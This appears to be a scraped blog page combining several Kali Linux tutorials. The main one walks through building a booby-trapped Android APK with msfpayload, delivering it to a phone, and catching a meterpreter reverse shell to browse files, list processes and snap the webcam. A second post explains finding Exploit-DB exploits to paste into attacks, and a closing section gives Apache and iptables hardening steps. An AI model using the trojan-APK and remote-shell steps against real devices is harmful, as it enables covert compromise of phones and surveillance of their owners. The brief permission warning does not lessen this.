Hack Android Remotely Using Kali Linux

This is a tutorial explaining how to remotely hack android device using Metasploit in Kali Linux.

Read my previous articles to setup Kali Linux:

An Introduction To Hacker’s OS: Kali Linux And Setup Tutorial

How to Install Kali Linux on Android

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

First up you need to find your public/external ip and port forwarding 

Let's start,

Creating a booby trapped APK file

Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for theLPORT address.)

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444

Then just type exploit to start the handler:

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:

9. You can see the processes running by typing, “ps”:

You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

Kali Linux Tutorial: Finding Exploits Using the Searchsploit Tool

What is Vulnerability Exploit?

Words like "exploit" and "vulnerability" are tightly bound together. Often, a script/program will exploit a specific vulnerability. Since most vulnerabilities are exploited by script kiddies, the vulnerability is often known by the name of the most popular script that exploits it. In any case, there are broad-spectrum vulnerability scanners/assessment tools that will scan a system and look for common vulnerabilities. These are often used in order to toughen up a computer system.

In computer security, the term vulnerability is applied to a weakness in a system that allows an attacker to violate the integrity of that system. Vulnerabilities may result from weak passwords, software bugs, a computer virus or a script code injection, and a SQL injection.

Introduction

When we are looking for ways to hack a system, we need a specific exploit to take advantage of a certain vulnerability in the operating system, service, or application.

Remember, exploitation is very specific, there is no one silver bullet that will allow you to exploit all systems. You need to find an exploit that will specifically take advantage of a vulnerability in the system that you are attacking. That is where the Exploit Database can be so incredibly useful.

EDB is a project of Offensive Security, the same folks who developed BackTrack and Kali Linux, which includes exploits categorized by platform, type, language, port, etc. to help you find the exploit that will work in your particular circumstance. Then, if you feel it will work on your target, you can simply copy and paste it into Kali for your attack.

Must read: An Introduction To Hacker’s OS: Kali Linux Setup Tutorial

Step 1: Fire Up Kali & Open a Browser

Let's start by firing up Kali and opening a browser, such as Iceweasel, the default browser in Kali (EDB can be reached from any browser, in any operating system). If we use the default browser in Kali, we can see that there is a built-in shortcut to the "Exploit-DB" in the browser shortcut bar, as seen below.

When we click on it, it takes us to the Exploit Database, as seen below.

If you are not using Iceweasel and its built-in shortcut, you can navigate to Exploit-DB by typing www.exploit-db.comin the URL bar.

Step 2: Search the Exploit Database

If we look at the top menu bar in the Exploit Database website, second from the right is a menu item called "Search". When we click on it, it enables us to search the database of exploits and returns a search function screen similar to the screenshot below.

Let's use this search function to find some recent Windows exploits (we are always looking for new Windows exploits, aren't we?). In the search function window, we can enter any of the following information;

• Description
• Free Text Search
• Author
• Platform (this is the operating system)
• Type
• Language
• Port
• OSVDB (the Open Source Vulnerability Database)
• CVE (Common Vulnerability and Exploits)

The last two fields can be used if you are specifically looking for an exploit that takes advantage of a known, numbered vulnerability in either of those databases.

In the Platform field, enter "Windows", in the Type field, enter "remote", and in the Free Text Search box, enter "Office". When we do so, the Exploit Database returns a list and a link to all of the exploits that meet those criteria. Of course, you can put in whatever criteria you are searching for. I am only using these as an example.

Step 3: Open an Exploit

From the search results page, we can click on any of the two pages of search results and it will take us to the particular exploit. I clicked on the very first exploit in the list "Internet Explorer TextRange Use-After Free (MS14_012)". When I do so, I am brought to a screen that displays the exploit code like that below. I have circled the description in the code of the exploit.

This exploit works against Internet Explorer that was built between August 2013 and March 2014. If you want to use it, you can simply copy and paste this text file and put it into the exploit directory in Metasploit (if you are using an up-to-date version of Metasploit, it is already included). This is a good example of how specific an exploit can be.
Step 4: Open Up Searchsploit

Kali, having also been developed by Offensive Security, has built into it a local database of exploits based on the same Exploit Database. We can access it by going to Applications -> Kali Linux -> Exploitation Tools -> Exploit Database and clicking on searchsploit as shown below.

It will open a screen like that below that details the basic syntax on how to use searchsploit. Note that it explains that you must use lowercase search terms and that it searches a CSV (comma separated values) file from left to right, so search term order matters.

Step 5: Search the Exploit Database with Searchsploit

Now that we have opened a terminal for searchsploit, we can now use this tool to search our local copy of the Exploit Database. As you might expect, our local copy of the exploit database is much faster to search, but does NOT have all the updates that the online database does. Despite this, unless we looking for the very latest exploits, the local database works fast and is effective.

One other note on its use. As the information is organized in CSV files, searches locally often will yield results slightly differently than the online database. In the screenshot below, I searched for "Windows" and "Office" and only received a single result, unlike what I received when I used the online database.

Exploit Database is an excellent repository for exploits and other hacks that we might need, including new Google hacks, white papers on security and hacking, denial of service (DOS) attacks, and shellcode that you can use out the box or tailor for your unique attack.

Linux Security

SECURITY 

Things to be considered before configuring apache server.

1.Hiding Apache version and OS information:

Apache displays its version and the name of the operating system in errors. A hacker can use this information to launch an attack. so server administration must hide the server signature. This can be with following command

vim /etc/httpd/conf/httpd.conf

>Go to the above directory

ServerSignature Off

>Off the default signature

service httpd restart

>restart the server to take effect the changes

2.Disable Directory Listing

If /var/www/ don’t have the index file then webserver shows the document root directory

This feature could be turn off for a specific directory through “options directive” available in the Apache configuration file.

Options -Indexes

3.Restricting Access to files outside the root directory

Configure the file like given below:

Options None

AllowOverride None

Order deny,allow

Deny from all

This will not allow user to access outside the web root directory

HOW TO INSERT RESTRICTION. 

To view the current iptables configuration

iptables -L

How to block all connections from a specific IP Address.

iptables -A INPUT -s (ip address) -j DROP

e.g.: iptables -A INPUT -s 192.168.1.22 -j DROP

How to block all of the IP Addresses in the 192.168.1.1/24 network range.

Standard method: iptables -A INPUT -s 192.168.1.1/24 -j DROP

OR

Netmask method: iptables -A INPUT -s 192.168.1.1/255.255.255.0 -j DROP

How to block SSH connections from any IP address.

iptables -A INPUT -p tcp --dport ssh -j DROP

How to block SSH connections from a specific IP Address.

iptables -A INPUT -p tcp --dport ssh -s 10.10.10.10 -j DROP

For tcp protocol use -p tcp

& for udp protocol use -p udp

The changes that you make to your iptables rules will be scrapped the next time that the iptables service gets restarted unless you execute a command to save the changes

For Ubuntu:

sudo /sbin/iptables-save

Red Hat / CentOS:

/sbin/service iptables save

Or

/etc/init.d/iptables save

To clear all the currently configured rules:

iptables -F

Linux sever Management

This summary is not available. Please click here to view the post.

Linux Network Management

This summary is not available. Please click here to view the post.